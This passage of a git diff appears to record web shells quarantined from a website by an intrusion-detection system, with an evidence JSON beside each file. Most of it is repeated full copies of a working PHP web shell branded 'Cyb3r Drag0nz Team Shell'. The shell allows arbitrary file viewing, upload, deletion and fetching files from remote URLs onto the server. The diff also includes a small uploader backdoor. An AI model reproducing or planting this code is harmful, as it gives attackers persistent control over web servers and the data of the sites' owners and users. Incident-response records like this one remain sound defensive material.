'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/media/f46vc3nzn1qw.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/media/f46vc3nzn1qw.php.json.evidence.json new file mode 100644 index 0000000..b9a3f0f --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/media/f46vc3nzn1qw.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4992", + "log_excerpt": "[quarantine] www.archlinexp.eu:media/f46vc3nzn1qw.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/media/f46vc3nzn1qw.php.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783353217, + "size": 10657, + "uid": 20043 + }, + "rel_path": "media/f46vc3nzn1qw.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/media/ko6h7s5e9kak.phtml.json b/var/www/hosting/archlinexp.eu/www/media/ko6h7s5e9kak.phtml.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/media/ko6h7s5e9kak.phtml.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/media/ko6h7s5e9kak.phtml.json.evidence.json b/var/www/hosting/archlinexp.eu/www/media/ko6h7s5e9kak.phtml.json.evidence.json new file mode 100644 index 0000000..0e2500f --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/media/ko6h7s5e9kak.phtml.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4994", + "log_excerpt": "[quarantine] www.archlinexp.eu:media/ko6h7s5e9kak.phtml.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/media/ko6h7s5e9kak.phtml.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783381492, + "size": 10657, + "uid": 20043 + }, + "rel_path": "media/ko6h7s5e9kak.phtml.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/media/yhajxaav.php.json b/var/www/hosting/archlinexp.eu/www/media/yhajxaav.php.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/media/yhajxaav.php.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/media/yhajxaav.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/media/yhajxaav.php.json.evidence.json new file mode 100644 index 0000000..7d93e03 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/media/yhajxaav.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4997", + "log_excerpt": "[quarantine] www.archlinexp.eu:media/yhajxaav.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/media/yhajxaav.php.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783346941, + "size": 10657, + "uid": 20043 + }, + "rel_path": "media/yhajxaav.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/modules/f46vc3nzn1qw.php.json b/var/www/hosting/archlinexp.eu/www/modules/f46vc3nzn1qw.php.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/modules/f46vc3nzn1qw.php.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/modules/f46vc3nzn1qw.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/modules/f46vc3nzn1qw.php.json.evidence.json new file mode 100644 index 0000000..00ffa39 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/modules/f46vc3nzn1qw.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "5283", + "log_excerpt": "[quarantine] www.archlinexp.eu:modules/f46vc3nzn1qw.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/modules/f46vc3nzn1qw.php.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783353228, + "size": 10657, + "uid": 20043 + }, + "rel_path": "modules/f46vc3nzn1qw.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/modules/mod_custom/f46vc3nzn1qw.php.json b/var/www/hosting/archlinexp.eu/www/modules/mod_custom/f46vc3nzn1qw.php.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/modules/mod_custom/f46vc3nzn1qw.php.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/modules/mod_custom/f46vc3nzn1qw.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/modules/mod_custom/f46vc3nzn1qw.php.json.evidence.json new file mode 100644 index 0000000..2c52e1a --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/modules/mod_custom/f46vc3nzn1qw.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "5284", + "log_excerpt": "[quarantine] www.archlinexp.eu:modules/mod_custom/f46vc3nzn1qw.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/modules/mod_custom/f46vc3nzn1qw.php.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783353229, + "size": 10657, + "uid": 20043 + }, + "rel_path": "modules/mod_custom/f46vc3nzn1qw.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/templates/50nnp2o4xt.php.json b/var/www/hosting/archlinexp.eu/www/templates/50nnp2o4xt.php.json new file mode 100644 index 0000000..0d0bf2f --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/templates/50nnp2o4xt.php.json @@ -0,0 +1,6 @@ +
+
\ No newline at end of file diff --git a/var/www/hosting/archlinexp.eu/www/templates/50nnp2o4xt.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/templates/50nnp2o4xt.php.json.evidence.json new file mode 100644 index 0000000..2ffa45c --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/templates/50nnp2o4xt.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "7182", + "log_excerpt": "[quarantine] www.archlinexp.eu:templates/50nnp2o4xt.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/templates/50nnp2o4xt.php.json)", + "original_sha256": "ad4e4ea904d90384d07ccb43d3f371bb03a5a647a997b991aeb4a8df6bc6dfe1", + "original_stat": { + "gid": 30037, + "mtime": 1784278952, + "size": 298, + "uid": 20043 + }, + "rel_path": "templates/50nnp2o4xt.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/templates/_h3x_672ba9cf.json b/var/www/hosting/archlinexp.eu/www/templates/_h3x_672ba9cf.json new file mode 100644 index 0000000..af5ab12 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/templates/_h3x_672ba9cf.json @@ -0,0 +1,32 @@ +$target"; + } else { + echo "❈ Upload failed!"; + } + exit; +} +?> + + +Upload + +
+

📤 UPLOAD

+ +

+ +
+ + \ No newline at end of file diff --git a/var/www/hosting/archlinexp.eu/www/templates/_h3x_672ba9cf.json.evidence.json b/var/www/hosting/archlinexp.eu/www/templates/_h3x_672ba9cf.json.evidence.json new file mode 100644 index 0000000..3e7932b --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/templates/_h3x_672ba9cf.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4949", + "log_excerpt": "[quarantine] www.archlinexp.eu:templates/_h3x_672ba9cf.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/templates/_h3x_672ba9cf.json)", + "original_sha256": "472487413017cc6446fb867187721d69b79661a600f964661fb0e1e2b3b92d5a", + "original_stat": { + "gid": 30037, + "mtime": 1783863642, + "size": 1102, + "uid": 20043 + }, + "rel_path": "templates/_h3x_672ba9cf.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/templates/_h3x_672ba9cf.php.json b/var/www/hosting/archlinexp.eu/www/templates/_h3x_672ba9cf.php.json new file mode 100644 index 0000000..af5ab12 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/templates/_h3x_672ba9cf.php.json @@ -0,0 +1,32 @@ +$target"; + } else { + echo "❈ Upload failed!"; + } + exit; +} +?> + + +Upload + +
+

📤 UPLOAD

+ +

+ +
+ + \ No newline at end of file diff --git a/var/www/hosting/archlinexp.eu/www/templates/_h3x_672ba9cf.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/templates/_h3x_672ba9cf.php.json.evidence.json new file mode 100644 index 0000000..79636f0 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/templates/_h3x_672ba9cf.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4948", + "log_excerpt": "[quarantine] www.archlinexp.eu:templates/_h3x_672ba9cf.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/templates/_h3x_672ba9cf.php.json)", + "original_sha256": "472487413017cc6446fb867187721d69b79661a600f964661fb0e1e2b3b92d5a", + "original_stat": { + "gid": 30037, + "mtime": 1783863596, + "size": 1102, + "uid": 20043 + }, + "rel_path": "templates/_h3x_672ba9cf.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/templates/beez3/f46vc3nzn1qw.php.json b/var/www/hosting/archlinexp.eu/www/templates/beez3/f46vc3nzn1qw.php.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/templates/beez3/f46vc3nzn1qw.php.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git 